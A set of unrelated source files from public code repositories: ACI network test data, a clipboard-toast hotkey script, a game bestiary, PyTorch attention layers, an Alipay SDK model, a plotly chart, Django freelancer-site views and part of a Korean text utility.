"lacpLagPolicy": "LACP-Active",
"type": "vPC"
}
]
# Leaf Interface Profile (and Access Port Selector)
LEAF_INTERFACE_PROFILES = [
{
"name": "Eagle10-5ME-CL10_leafInterfaceProfile",
"accessPortSelector": [
{
"name": "Eagle10-5ME-CL10_accessPortSelector",
"policyGroup": POLICY_GROUPS[1],
"interfaces": [
{
"blockName": "block1_17-to-20",
"fromCard": "1",
"toCard": "1",
"fromPort": "17",
"toPort": "20"
}
]
}
]
},
{
"name": "Eagle10-5ME-CL10-TCS_leafInterfaceProfile",
"accessPortSelector": [
{
"name": "Eagle10-5ME-CL10_TCS_accessPortSelector",
"policyGroup": POLICY_GROUPS[0],
"interfaces": [
{
"blockName": "block1_14",
"fromCard": "1",
"toCard": "1",
"fromPort": "14",
"toPort": "14"
}
]
}
]
}
]
LEAF_PROFILES = [
{
"name": "Eagle10-5ME-CL10_leafProfile_101",
"leafSelectors": [
{
"name": "Eagle10-5ME-CL10_leafSelector_101",
"blocks": [
{
"name": "block_101",
"from_": "101",
"to_": "101"
}
]
}
],
"leafInterfaceProfile": "Eagle10-5ME-CL10_leafInterfaceProfile"
},
{
"name": "Eagle10-5ME-CL10_leafProfile_103",
"leafSelectors": [
{
"name": "Eagle10-5ME-CL10_leafSelector_103",
"blocks": [
{
"name": "block_103",
"from_": "103",
"to_": "103"
}
]
}
],
"leafInterfaceProfile": "Eagle10-5ME-CL10_leafInterfaceProfile"
},
{
"name": "Eagle10-5ME-CL10_TCS_leafProfile",
"leafSelectors": [
{
"name": "Eagle10-5ME-CL10_TCS_leafSelector",
"blocks": [
{
"name": "block_101",
"from_": "101",
"to_": "101"
}
]
}
],
"leafInterfaceProfile": "Eagle10-5ME-CL10-TCS_leafInterfaceProfile"
}
]
# Tenant and App Details for the Test Environment.
def create_x_tenants(prefix, count):
    """
    Create x number of tenant names.

    Arguments:
        prefix - tenant name prefix
        count - number of tenants to generate

    Return:
        list of tenant names in '<prefix>_<index>' format
    """
    # range + list comprehension: works on Python 2 and 3 (xrange is py2-only)
    return [prefix + '_' + str(x) for x in range(count)]
TENANT_PREFIX = "Eagle10-5ME-CL10"
TENANT_COUNT = 50
TENANTS = create_x_tenants(TENANT_PREFIX, TENANT_COUNT)
# Application Profiles
def define_application_profiles(tenant_prefix, profile_prefix, count):
    """
    Define application profiles. This assumes 1:1 profile to tenant ratio.

    Arguments:
        tenant_prefix - tenants name prefix
        profile_prefix - profile name prefix
        count - x number of profiles

    Return:
        dictionary of tenant-profile key-value pairs
    """
    # dict comprehension + range: Python 2/3 compatible (was xrange)
    return {tenant_prefix + '_' + str(x): profile_prefix + '_' + str(x)
            for x in range(count)}
PROFILE_PREFIX = "Eagle10-ApplicationProfile"
APP_PROFILES = define_application_profiles(TENANT_PREFIX, PROFILE_PREFIX, TENANT_COUNT)
STATIC_PORTS = {
'US1': [
{'pod': '1', 'node': 'paths-101', 'path': 'eth1/13'},
{'pod': '1', 'node': 'protpaths-101-103', 'path': 'Eagle10-5ME-CL10_vpcPolicyGrp'}
]
}
# VLAN Ranges to configure on ACI/APIC
def define_tenant_vlan_range(tenant_prefix, tenant_count, start_vlan, end_vlan):
    """
    Distribute the inclusive vlan range [start_vlan, end_vlan] across
    tenant_count tenants.

    Arguments:
        tenant_prefix - tenants name prefix
        tenant_count - x number of tenants
        start_vlan - first vlan id (inclusive)
        end_vlan - last vlan id (inclusive)

    Return:
        dictionary mapping tenant name -> list with one range dict, e.g.
        {'T_0': [{'start': 10, 'end': 29, 'encap': 'vlan'}], ...}
        Each tenant gets est+1 vlans; the LAST tenant absorbs whatever
        remains up to end_vlan.
    """
    tenant_vlans = {}
    # total vlans available (both endpoints inclusive)
    total_vlans = (end_vlan - start_vlan) + 1
    est_vlan = int(total_vlans / tenant_count)
    # range instead of xrange so this works on Python 2 and 3
    for x in range(tenant_count):
        if x != (tenant_count - 1):
            tenant_vlans[tenant_prefix + '_' + str(x)] = [{'start': start_vlan, 'end': start_vlan + est_vlan, 'encap': 'vlan'}]
        else:
            # last tenant takes everything that is left
            tenant_vlans[tenant_prefix + '_' + str(x)] = [{'start': start_vlan, 'end': end_vlan, 'encap': 'vlan'}]
        start_vlan = start_vlan + est_vlan + 1
    return tenant_vlans
VLAN_RANGES = define_tenant_vlan_range(TENANT_PREFIX, TENANT_COUNT, 10, 1000)
# Bridge Domain has to map with EPG and vice versa
def define_bridge_domains(tenant_prefix, bd_prefix, tenant_count):
    """
    Define bridge domains (1:1 with tenants), reusing each tenant's vlan
    range from the module-level VLAN_RANGES / TENANTS tables.

    Arguments:
        tenant_prefix - tenant name prefix
        bd_prefix - bridge domain name prefix
        tenant_count - x number of tenants

    Return:
        dictionary mapping tenant name -> list with one BD spec dict
    """
    bridge_domains = {}
    # range instead of xrange so this works on Python 2 and 3
    for x in range(tenant_count):
        bridge_domains[tenant_prefix + '_' + str(x)] = [{"namePrefix": bd_prefix, "vlanRange": VLAN_RANGES[TENANTS[x]][0], "scope": None, "subnetIPv4Addr": None, "arpFlood": "yes", "unkMacUcastAct": "flood"}]
    return bridge_domains
BD_PREFIX = "BD_Vlan-"
BRIDGE_DOMAINS = define_bridge_domains(TENANT_PREFIX, BD_PREFIX, TENANT_COUNT)
# EPGs
# NOTE: Since we are using 1:1 mapping of BD and EPG, we will be using the same vlanRange defined in BD.
def define_epgs(tenant_prefix, epg_prefix, tenant_count):
    """
    Define EPGs (1:1 with bridge domains), reusing the module-level
    BRIDGE_DOMAINS / TENANTS / STATIC_PORTS tables.

    Arguments:
        tenant_prefix - tenant name prefix
        epg_prefix - EPG name prefix
        tenant_count - x number of tenants

    Return:
        dictionary mapping tenant name -> list with one EPG spec dict
    """
    epgs = {}
    # range instead of xrange so this works on Python 2 and 3
    for x in range(tenant_count):
        epgs[tenant_prefix + '_' + str(x)] = [{"namePrefix": epg_prefix, "bridgeDomain": BRIDGE_DOMAINS[TENANTS[x]][0], 'staticPorts': STATIC_PORTS['US1'], "domain": {"profile": "Eagle10-5ME-CL10-PD_10-TO-1000", "type": "phys"}}]
    return epgs
EPG_PREFIX = "EPG_vlan-"
EPGS = define_epgs(TENANT_PREFIX, EPG_PREFIX, TENANT_COUNT)
# VRF can be 1 to many BD
def define_vrfs(tenant_prefix, vrf_prefix, count):
    """
    Define VRFs. This assumes 1:1 vrf to tenant ratio.

    Arguments:
        tenant_prefix - tenant name prefix
        vrf_prefix - VRF name prefix
        count - x number of VRFs

    Return:
        dictionary mapping tenant name -> VRF name
    """
    # dict comprehension + range: Python 2/3 compatible (was xrange)
    return {tenant_prefix + '_' + str(x): vrf_prefix + '_' + str(x)
            for x in range(count)}
VRF_PREFIX = "Eagle10-VRF"
VRFS = define_vrfs(TENANT_PREFIX, VRF_PREFIX, TENANT_COUNT)
| richa92/Jenkin_Regression_Testing | robo4.2/fusion/tests/wpst_crm/ci_fit/tools/aci/resources/5ME-CL10-APIC_multi_data_variable.py | 5ME-CL10-APIC_multi_data_variable.py | py | 14,197 | python | en | code | 0 | github-code | 13 |
73054672977 | from pynput import keyboard
import pandas as pd
from win10toast import ToastNotifier
def on_activate():
    """Show the clipboard's first column header as a Windows toast."""
    # read_clipboard parses the current clipboard text as a table
    df = pd.read_clipboard()
    toster = ToastNotifier()
    # display the first column name for 5 seconds
    toster.show_toast("title", df.columns[0], duration=5)
# Block on the hotkey listener; on_activate fires each time Ctrl is pressed.
with keyboard.GlobalHotKeys({
    '<ctrl>': on_activate}) as h:
    h.join()
| FlintyLemming/picManagementUtilities | duplicateCheck/main.py | main.py | py | 315 | python | en | code | 0 | github-code | 13 |
19375055905 | #!/usr/bin/python
def beast(id):
    """
    Look up a monster stat block by full name, short alias, or numeric id.

    Arguments:
        id - monster name (e.g. 'Giant Rat'), alias (e.g. 'rat'),
             or numeric string '1'..'11'

    Return:
        dict of stats: name, hp, max/min damage, def, agi, acc, crit, exp

    Raises:
        ValueError for an unknown id (the original if-chain raised an
        opaque UnboundLocalError here).
    """
    bestiary = [
        (('Goblin Smuggler', '1', 'goblin'),
         {'name': 'Goblin Smuggler', 'hp': 5, 'max': 2, 'min': 1, 'def': 0, 'agi': 20, 'acc': 5, 'crit': 1, 'exp': 25}),
        (('Giant Rat', '2', 'rat'),
         {'name': 'Giant Rat', 'hp': 7, 'max': 2, 'min': 1, 'def': 0, 'agi': 25, 'acc': 1, 'crit': 5, 'exp': 35}),
        (('Rock Crab', 'crab', '3'),
         {'name': 'Rock Crab', 'hp': 5, 'max': 1, 'min': 1, 'def': 2, 'agi': 10, 'acc': 1, 'crit': 1, 'exp': 25}),
        (('Armored Bear', '4', 'bear'),
         {'name': 'Armored Bear', 'hp': 10, 'max': 1, 'min': 1, 'def': 1, 'agi': 10, 'acc': 1, 'crit': 1, 'exp': 35}),
        (('Beserk Farmer', '5', 'farmer'),
         {'name': 'Beserk Farmer', 'hp': 5, 'max': 2, 'min': 2, 'def': 0, 'agi': 15, 'acc': 1, 'crit': 1, 'exp': 35}),
        (('Wizard Novice', '6', 'wizard'),
         {'name': 'Wizard Novice', 'hp': 5, 'max': 4, 'min': 0, 'def': -1, 'agi': 15, 'acc': 1, 'crit': -1, 'exp': 25}),
        (('Stone Golem', 'golem', '7'),
         {'name': 'Stone Golem', 'hp': 20, 'max': 4, 'min': 2, 'def': 4, 'agi': 0, 'acc': -10, 'crit': 1, 'exp': 500}),
        (('Enraged Minotaur', 'bull', '8'),
         {'name': 'Enraged Minotaur', 'hp': 20, 'max': 6, 'min': 4, 'def': 2, 'agi': 10, 'acc': 0, 'crit': 1, 'exp': 500}),
        (('Highway Man', 'robber', '9'),
         {'name': 'Highway Man', 'hp': 15, 'max': 5, 'min': 1, 'def': 0, 'agi': 45, 'acc': 10, 'crit': 20, 'exp': 500}),
        (('Agile Marksman', 'archer', '10'),
         {'name': 'Agile Marksman', 'hp': 15, 'max': 5, 'min': 1, 'def': 1, 'agi': 30, 'acc': 20, 'crit': 10, 'exp': 500}),
        (('Elemental Apparition', 'spirit', '11'),
         {'name': 'Elemental Apparition', 'hp': 12, 'max': 10, 'min': 0, 'def': 0, 'agi': 15, 'acc': 1, 'crit': -1, 'exp': 500}),
    ]
    for aliases, stats in bestiary:
        if id in aliases:
            # return a copy so callers can mutate their monster freely
            return dict(stats)
    raise ValueError('unknown monster id: %r' % (id,))
| deathkj/battle | beastiary.py | beastiary.py | py | 2,123 | python | en | code | 0 | github-code | 13 |
18445803662 | '''
This model is to build a attention layer.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
__all__ = ['attention_layer', 'attention_layer_light']
class attention_layer(nn.Module):
    """Texture-guided self-attention: queries come from the texture map,
    keys/values from the input feature map; the result is mixed back into
    the input through a learnable residual weight."""

    def __init__(self, in_dim, texture_dim):
        super(attention_layer, self).__init__()
        reduced = in_dim // 8
        # 1x1 projections for query/key/value plus a final mixing conv
        self.query_conv = nn.Conv2d(in_channels=texture_dim, out_channels=reduced, kernel_size=1)
        self.key_conv = nn.Conv2d(in_channels=in_dim, out_channels=reduced, kernel_size=1)
        self.value_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)
        self.final_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)
        self.softmax = nn.Softmax(dim=-1)
        # zero init makes the block an exact identity at the start of training
        self.gamma = nn.Parameter(torch.zeros(1))

    def forward(self, x, z):
        """
        input:
            x: feature maps (batch, C_in, H, W)
            z: texture images (batch, C_texture, H, W)
        output:
            out: gamma * attention value + x, shape (batch, C_in, H, W)
            attention: (batch, N, N) with N = H * W
        """
        n_batch, n_chan, dim2, dim3 = x.size()
        n_pix = dim2 * dim3
        queries = self.query_conv(z).view(n_batch, -1, n_pix).permute(0, 2, 1)  # (B, N, C')
        keys = self.key_conv(x).view(n_batch, -1, n_pix)                        # (B, C', N)
        attention = self.softmax(torch.bmm(queries, keys))                      # (B, N, N)
        values = self.value_conv(x).view(n_batch, -1, n_pix)                    # (B, C, N)
        mixed = torch.bmm(values, attention.permute(0, 2, 1))                   # (B, C, N)
        mixed = self.final_conv(mixed.view(n_batch, n_chan, dim2, dim3))
        return self.gamma * mixed + x, attention
class attention_layer_light(nn.Module):
    """Lightweight spatial attention: a single-channel soft mask over the
    H*W positions, applied to the input as a gated residual."""

    def __init__(self, in_dim):
        super(attention_layer_light, self).__init__()
        self.conv1 = nn.Conv2d(in_dim, in_dim, kernel_size=3, stride=1, padding=1)
        self.conv2 = nn.Conv2d(in_dim, 1, kernel_size=1, stride=1)
        self.softmax = nn.Softmax(dim=-1)
        # zero init makes the block an exact identity at the start of training
        self.gamma = nn.Parameter(torch.zeros(1))
        self.in_dim = in_dim

    def forward(self, x):
        """
        input:
            x: feature maps (batch, C_in, H, W)
        output:
            out: gamma * glimpse + x, shape (batch, C_in, H, W)
            attention: (batch, 1, H, W), sums to 1 over H*W per sample
        """
        identity = x
        scores = self.conv2(torch.tanh(self.conv1(x)))          # (B, 1, H, W)
        flat = self.softmax(scores.view(scores.size(0), -1))    # (B, H*W)
        weights = flat.view(scores.size())                      # (B, 1, H, W)
        glimpse = identity * weights.repeat(1, self.in_dim, 1, 1)
        return self.gamma * glimpse + identity, weights
# unit testing
if __name__ == '__main__':
# fake input feature map
batch_size = 2
Height = 32
Width = 32
Channel = 128
texture_dim = 1
features = torch.randn(batch_size,Channel,Height,Width)
texture_image = torch.randn(batch_size, texture_dim, Height, Width)
attn_layer = attention_layer(Channel, texture_dim)
new_features, att_map = attn_layer(features, texture_image)
print(new_features)
print("shape of new feature map is:", new_features.shape)
print("shape of attention map is:", att_map.shape)
batch_size = 16
Height = 160
Width = 160
Channel = 512
features = torch.randn(batch_size,Channel,Height,Width)
attn_layer = attention_layer_light(Channel)
new_features, att_map = attn_layer(features)
print(new_features)
print(att_map[0][0].sum())
print("shape of new feature map is:", new_features.shape)
print("shape of attention map is:", att_map.shape) | liuch37/tanet-pytorch | models/attention_layer.py | attention_layer.py | py | 3,899 | python | en | code | 0 | github-code | 13 |
17055240444 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class LabelFilter(object):
    """One filter condition: a column name, an operator and a value list."""

    def __init__(self):
        self._column_name = None
        self._op = None
        self._values = None

    @property
    def column_name(self):
        return self._column_name

    @column_name.setter
    def column_name(self, value):
        self._column_name = value

    @property
    def op(self):
        return self._op

    @op.setter
    def op(self, value):
        self._op = value

    @property
    def values(self):
        return self._values

    @values.setter
    def values(self, value):
        # only list assignments are accepted; elements are copied one by one
        if isinstance(value, list):
            self._values = list()
            for i in value:
                self._values.append(i)

    def to_alipay_dict(self):
        """Serialize to a plain dict, converting nested SDK models."""
        params = dict()
        for key in ('column_name', 'op'):
            val = getattr(self, key)
            if val:
                params[key] = val.to_alipay_dict() if hasattr(val, 'to_alipay_dict') else val
        if self.values:
            if isinstance(self.values, list):
                # convert model elements in place, mirroring the upstream SDK
                for i in range(0, len(self.values)):
                    element = self.values[i]
                    if hasattr(element, 'to_alipay_dict'):
                        self.values[i] = element.to_alipay_dict()
            params['values'] = self.values.to_alipay_dict() if hasattr(self.values, 'to_alipay_dict') else self.values
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a LabelFilter from a dict; falsy input yields None."""
        if not d:
            return None
        o = LabelFilter()
        for key in ('column_name', 'op', 'values'):
            if key in d:
                setattr(o, key, d[key])
        return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/LabelFilter.py | LabelFilter.py | py | 2,089 | python | en | code | 241 | github-code | 13 |
11665042650 | import plotly.offline as pyo
import plotly.graph_objs as go
import pandas as pd
# Medal counts per National Olympic Committee, 2018 Winter Olympics.
df=pd.read_csv('plotly\\Plotly-Dashboards-with-Dash-master\\Data\\2018WinterOlympics.csv')
# One bar trace per medal colour (gold / silver / bronze hex colours).
trace0=go.Bar(x=df['NOC'],y=df['Gold'],name='Gold',marker={'color':'#FFD700'})
trace1=go.Bar(x=df['NOC'],y=df['Silver'],name='Silver',marker={'color':'#9EA0A1'})
trace2=go.Bar(x=df['NOC'],y=df['Bronze'],name='Bronze',marker={'color':'#CD7F32'})
data=[trace0,trace1,trace2]
layout=go.Layout(title="Total Medals")# for stacking barmode='stack')
fig=go.Figure(data,layout)
# Renders the chart to an HTML file and opens it in the default browser.
pyo.plot(fig)
| jyothsnashaji/plotly-dash | barchart.py | barchart.py | py | 578 | python | en | code | 0 | github-code | 13 |
3750508320 | from calendar import month_name
from django.contrib.auth.decorators import login_required
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.db.models import Q
from django.http import JsonResponse, Http404, HttpResponseBadRequest
from django.shortcuts import render, get_object_or_404, redirect
from django.template.loader import render_to_string
from accounts.decorators import freelancer_required, valid_user_for_proposal
from employer.models import PostTask
from hireo.models import HitCount
from .forms import ProposalForm
from .models import Proposal
from employer.models import Offers
from notification.models import Notification, notification_handler
@login_required
@freelancer_required
def submit_proposals(request):
    """AJAX endpoint: place a bid (proposal) on a task.

    Rejects duplicate bids from the same user; returns JSON with either
    a success message + redirect url or per-field form errors.
    """
    try:
        if request.method == "POST" and request.is_ajax():
            task = get_object_or_404(PostTask, pk=request.POST['task_id'])
            # one bid per user per task
            if task.proposals.filter(user=request.user).exists():
                return JsonResponse({"success": False, "errors": "You bid has already been submitted."})
            form = ProposalForm(request.POST)
            if form.is_valid():
                proposal = form.save(commit=False)
                proposal.user = request.user
                proposal.task = task
                proposal.save()
                return JsonResponse(
                    {"success": True, "msg": "Your bid has been submitted.", "url": redirect('my_proposals').url})
            else:
                # strip the list/quote wrappers from Django's error reprs
                errors = {field: str(error[0])[1:-1][1:-1] for (field, error) in form.errors.as_data().items()}
                return JsonResponse({'success': False, 'errors': errors})
        else:
            return HttpResponseBadRequest()
    except Exception as e:
        # NOTE(review): any error (including the Http404 from
        # get_object_or_404) is re-raised as Http404 with its message
        raise Http404(str(e))
@login_required
@freelancer_required
def my_proposals(request):
    """List the freelancer's bids, optionally filtered/sorted via the
    'sort-by' query parameter, paginated 4 per page."""
    sort = request.GET.get("sort-by", None)
    proposal_list = Proposal.objects.filter(user=request.user).select_related("task").exclude(task_id=None).order_by(
        '-updated_at')
    # explicit status filter (anything except 'pending'/'relevance')
    if sort != 'pending' and sort != "relevance" and sort:
        proposal_list = proposal_list.filter(status__iexact=sort)
    elif sort == "pending":
        # pending bids are stored with a NULL status
        proposal_list = proposal_list.filter(status__isnull=True)
    else:
        # relevance / default: fixed status order (accepted, pending,
        # completed, cancelled)
        order = ['accepted', None, 'completed', 'cancelled']
        order = {key: i for i, key in enumerate(order)}
        proposal_list = sorted(proposal_list, key=lambda proposal: order.get(proposal.status, 0))
        # proposal_list = proposal_list.order_by('-created_at')
    page = request.GET.get('page', 1)
    paginator = Paginator(proposal_list, 4)
    try:
        proposals = paginator.page(page)
    except PageNotAnInteger:
        proposals = paginator.page(1)
    except EmptyPage:
        proposals = paginator.page(paginator.num_pages)
    return render(request, 'Freelancer/MyProposals.html', {"proposals": proposals})
@login_required
@freelancer_required
@valid_user_for_proposal
def delete_proposal(request, id):
    """AJAX endpoint: delete one of the freelancer's pending bids.

    Only proposals whose status is still NULL (pending) may be deleted.
    Returns an empty-state HTML fragment when the last bid is removed.
    """
    try:
        if request.method == "POST" and request.is_ajax():
            proposal = get_object_or_404(Proposal, pk=id)
            if proposal.status is not None:
                return JsonResponse(
                    {"success": False, "errors": "You are not permitted to delete this Proposal"})
            proposal.delete()
            html = None
            if not request.user.proposals.exclude(task_id=None).exists():
                msg = "Currently you have not placed any bid yet."
                html = render_to_string("common/partial_empty_msg.html", {"msg": msg})
            return JsonResponse(
                {"success": True, "deleted": True, "html": html, "msg": "Proposal successfully deleted."})
        else:
            raise Http404("Invalid request")
    except Exception as e:
        # blanket re-wrap as 404 (consistent with the sibling views)
        raise Http404(str(e))
@login_required
@freelancer_required
@valid_user_for_proposal
def cancel_task(request, id):
    """AJAX endpoint: cancel an accepted job.

    Resets the task to 'Pending', marks the proposal cancelled, refreshes
    the freelancer's success rate/rating, and notifies the employer.
    """
    try:
        if request.method == "POST" and request.is_ajax():
            proposal = get_object_or_404(Proposal, pk=id)
            proposal.task.job_status = "Pending"
            proposal.status = "cancelled"
            proposal.task.save()
            proposal.save()
            # calculate success rate and overall profile rating
            user = request.user
            user.profile.success_rate = user.profile.calculate_success_rate()
            user.profile.rating = user.profile.calculate_rating()
            user.profile.save()
            notification_handler(request.user, proposal.task.user, Notification.TASK_CANCELLED, target=proposal.task)
            return JsonResponse({"success": True, "msg": "Job cancelled."})
        else:
            raise Http404("Invalid request")
    except Exception as e:
        raise Http404(str(e))
@login_required
@freelancer_required
@valid_user_for_proposal
def task_completed(request, id):
    """AJAX endpoint: mark an accepted job as completed.

    Updates task/proposal status, bumps the freelancer's job counter,
    refreshes success rate/rating, and notifies the employer.
    """
    try:
        if request.method == "POST" and request.is_ajax():
            proposal = get_object_or_404(Proposal, pk=id)
            proposal.task.job_status = 'Completed'
            proposal.user.profile.total_job_done += 1
            proposal.status = 'completed'
            proposal.task.save()
            proposal.user.profile.save()
            proposal.save()
            # calculate success rate and overall profile rating
            user = request.user
            user.profile.success_rate = user.profile.calculate_success_rate()
            user.profile.rating = user.profile.calculate_rating()
            user.profile.save()
            notification_handler(request.user, proposal.task.user, Notification.TASK_COMPLETED, target=proposal.task)
            return JsonResponse({"success": True, "msg": "Job Completed."})
        else:
            raise Http404("Invalid request")
    except Exception as e:
        raise Http404(str(e))
@login_required
@freelancer_required
def dashboard(request):
    """Freelancer dashboard: six months of profile-view counts for the
    chart plus a paginated notification list (AJAX requests get only the
    rendered notification-list fragment)."""
    views = HitCount.objects.filter(profile=request.user.profile)
    month = request.user.profile.created_at.month
    # per-month view counts for the 6 months starting at the signup month;
    # '(m % 12) or 12' maps month 0 back to December; zero counts become
    # '' so the chart leaves those points empty
    data = [views.filter(created_at__month=((month + x) % 12) or 12).count() or '' for x in range(6)]
    labels = [month_name[((month + i) % 12) or 12] for i in range(6)]
    # notifications
    notifications_list = request.user.notifications.all()
    page = request.GET.get('page', 1)
    paginator = Paginator(notifications_list, 5)
    try:
        notifications = paginator.page(page)
    except PageNotAnInteger:
        notifications = paginator.page(1)
    except EmptyPage:
        notifications = paginator.page(paginator.num_pages)
    if request.is_ajax():
        html = render_to_string("Notification/include/partial_dashboard_notifications_list.html",
                                {"notifications": notifications})
        return JsonResponse({"success": True, "html": html})
    context = {
        "labels": labels,
        "data": data,
        "notifications": notifications
    }
    # Removed a stray render_to_string('Freelancer/includes/partial_views_chart.html',
    # context) call whose result was discarded -- it rendered a template on
    # every page load for nothing.
    return render(request, 'Freelancer/Dashboard.html', context)
@login_required
@freelancer_required
def offers(request):
    """List the offers sent to this freelancer, 4 per page."""
    offer_list = Offers.objects.filter(profile=request.user.profile).order_by('-created_at')
    # default to page 1 like the other list views in this module
    # (previously None, which only worked because PageNotAnInteger was
    # caught below)
    page = request.GET.get('page', 1)
    paginator = Paginator(offer_list, 4)
    try:
        offer_list = paginator.page(page)
    except PageNotAnInteger:
        offer_list = paginator.page(1)
    except EmptyPage:
        offer_list = paginator.page(paginator.num_pages)
    return render(request, 'Freelancer/Offers.html', {"offers": offer_list})
@login_required
@freelancer_required
def delete_offer(request, id):
    """AJAX endpoint: delete one of the freelancer's received offers.

    Only the offer's own recipient may delete it. Returns an empty-state
    HTML fragment when the last offer is removed.
    """
    try:
        if request.method == "POST" and request.is_ajax():
            offer = get_object_or_404(Offers, pk=id)
            if offer:
                # ownership check: only the offer's recipient may delete
                if offer.profile != request.user.profile:
                    return JsonResponse(
                        {"success": False, "errors": "You are not permitted to perform this operation."})
                offer.delete()
                html = None
                if not request.user.profile.offers.exists():
                    msg = "There is no offers."
                    html = render_to_string("common/partial_empty_msg.html", {"msg": msg})
                return JsonResponse({"success": True, "msg": "Offer Deleted", "html": html})
        else:
            raise Http404("Invalid request")
    except Exception as e:
        raise Http404(str(e))
@login_required
@freelancer_required
def reviews(request):
    """List the freelancer's rated, completed proposals (reviews),
    3 per page."""
    proposal_list = Proposal.objects.filter(Q(user=request.user) & Q(task__isnull=False)).order_by("-updated_at")
    if proposal_list.exists():
        # only completed jobs that actually received a non-zero rating
        proposal_list = proposal_list.filter(Q(status__iexact="completed") & ~Q(rating=0.0))
    page = request.GET.get('page', 1)
    paginator = Paginator(proposal_list, 3)
    try:
        proposals = paginator.page(page)
    except PageNotAnInteger:
        proposals = paginator.page(1)
    except EmptyPage:
        proposals = paginator.page(paginator.num_pages)
    return render(request, 'Freelancer/Reviews.html', {"proposals": proposals})
| umairkhan987/Job-Boards | freelancers/views.py | views.py | py | 9,162 | python | en | code | 0 | github-code | 13 |
27470947255 | from django.shortcuts import render
from django.core.files.storage import FileSystemStorage
from .models import Video
from django.http import HttpResponse
from django.http import HttpResponseForbidden
from django.contrib.auth.decorators import login_required
import os
from hc.settings import BASE_DIR
def index(request):
    """Render the help-videos listing page with all stored videos."""
    ctx = {
        'section': "help-videos",
        'videos': Video.objects.all()
    }
    return render(request, 'help_videos/videos.html', ctx)
def admin_required(func):
    """Decorator: allow the wrapped view only for superusers, else 403."""
    # define admin checking decorator
    def wrap(request):
        if request.user.is_superuser:
            return func(request)
        else:
            return HttpResponseForbidden()
    # preserve the wrapped view's identity for URL resolution/debugging
    wrap.__name__ = func.__name__
    wrap.__doc__ = func.__doc__
    return wrap
def verify_filetype(func):
    """Decorator: run the wrapped view only when the uploaded
    'video-file' (if any) is an mp4; otherwise return an explanatory
    response.

    Fixes vs the original: requests without an uploaded file no longer
    crash with a KeyError (they fall through to the view, which already
    handles non-POST requests); the extension check is case-insensitive;
    and the wrapper preserves __name__/__doc__ like admin_required does.
    """
    def wrap(request):
        video = request.FILES.get("video-file")
        if video is None:
            # no upload present (e.g. a plain GET): let the view decide
            return func(request)
        ext = video.name.split(".")[-1].lower()
        # can check for more extensions here
        if ext == 'mp4':
            return func(request)
        else:
            return HttpResponse("Only mp4 video files allowed at the moment, .{} file types not allowed".format(ext))
    wrap.__name__ = func.__name__
    wrap.__doc__ = func.__doc__
    return wrap
@login_required
@admin_required
@verify_filetype
def upload(request):
    """Handle an admin video upload: store the file on disk and create
    the matching Video row; responds with plain 'success'/'failed'."""
    if request.method == 'POST':
        title, desc = request.POST['title'], request.POST['description']
        video = request.FILES['video-file']
        if len(title) < 1 or len(desc) < 1:
            return HttpResponse("Please fill all fields")
        fstorage = FileSystemStorage()
        # save() deduplicates the name; url() is what we persist
        fname = fstorage.save(video.name, video)
        upload_uri = fstorage.url(fname)
        # Add entry to database
        video = Video(title=title, description=desc, resource_url=upload_uri)
        video.save()
        return HttpResponse("success")
    else:
        return HttpResponse("failed")
@login_required
@admin_required
def delete_video(request):
    """Delete a help video (admin only): removes the file from disk and
    the row from the database.

    Fixes vs the original: deletes the file with os.remove instead of
    interpolating a database-controlled path into `os.system("rm -r ...")`
    (a shell-injection risk), tolerates an already-missing file, and
    drops the leftover `"success".format(BASE_DIR)` debug artifact.
    """
    if request.method == 'POST':
        request_id = request.POST['id']
        if request_id:
            obj = Video.objects.filter(id=request_id).first()
            if obj is not None:
                # undo the URL-encoding of spaces before touching the fs
                file_path = "{}{}".format(BASE_DIR, obj.resource_url).replace("%20", " ")
                try:
                    os.remove(file_path)
                except OSError:
                    pass  # file already gone; still delete the DB row
            Video.objects.filter(id=request_id).delete()
            return HttpResponse("success")
    else:
        return HttpResponse("Operation not allowed")
| andela/dashiki-healthchecks | hc/help_videos/views.py | views.py | py | 2,440 | python | en | code | 1 | github-code | 13 |
327009991 | import re
from jamo import h2j, j2hcj
from cached_property import cached_property
from pathlib import Path
import pandas as pd
"""a list of vowels"""
korean_vowel = ['ㅏ','ㅑ', 'ㅓ', 'ㅕ', 'ㅗ', 'ㅛ', 'ㅜ', 'ㅠ', 'ㅡ','ㅣ','ㅒ',
'ㅐ','ㅔ', 'ㅖ', 'ㅟ', 'ㅚ', 'ㅙ', 'ㅞ']
"""a string to a list"""
def make_list(words):
    """Split a comma-separated string, strip every non-Hangul character,
    and drop entries that end up empty."""
    cleaned = (re.sub('[^가-힣]', '', part) for part in words.split(','))
    return [token for token in cleaned if token]
"""open the file"""
def open_dir(dir):
    """Open an .xlsx or .csv table and return it as a DataFrame.

    Raises:
        Exception if the extension is neither csv nor xlsx.
    """
    if dir.endswith('.xlsx'):
        return pd.read_excel(dir, header = 0)
    elif dir.endswith('.csv'):
        # bug fix: the csv branch previously called pd.read_excel,
        # which fails on plain-text csv files
        return pd.read_csv(dir, header = 0)
    else:
        raise Exception('The type of file should be csv or xlsx')
"""save_the_file"""
def save_file(result, output_dir, file_name, output_type = 'xlsx'):
    """Save `result` as <output_dir>/<file_name>.<output_type>.

    Creates output_dir if missing; '/' characters in file_name are
    replaced with '-' so they cannot act as path separators.

    Raises:
        Exception if output_type is neither 'xlsx' nor 'csv'.
    """
    output_dir = Path(output_dir)
    output_dir.mkdir(exist_ok = True)
    # sanitize: keep the name a single path component
    file_name = re.sub('/','-',file_name)
    if output_type == 'xlsx':
        file_name += '.xlsx'
        pd.DataFrame(result).to_excel(output_dir / Path(file_name))
    elif output_type == 'csv':
        file_name += '.csv'
        pd.DataFrame(result).to_csv(output_dir / Path(file_name))
    else:
        raise Exception('The type of file should be csv or xlsx')
class Jongsung:
    """Inspect the final jamo of a word's last syllable and record
    whether it is a vowel and/or a liquid ('ㄹ')."""
    def __init__(self, word, vowel_list = korean_vowel):
        self.word = word
        # vowel: final jamo is a vowel; liquid: final jamo is a vowel or 'ㄹ'
        self.vowel, self.liquid = False, False
        self._build(vowel_list)
    @cached_property
    def jongsung(self):
        """Last jamo of the word's final syllable (decomposed via jamo)."""
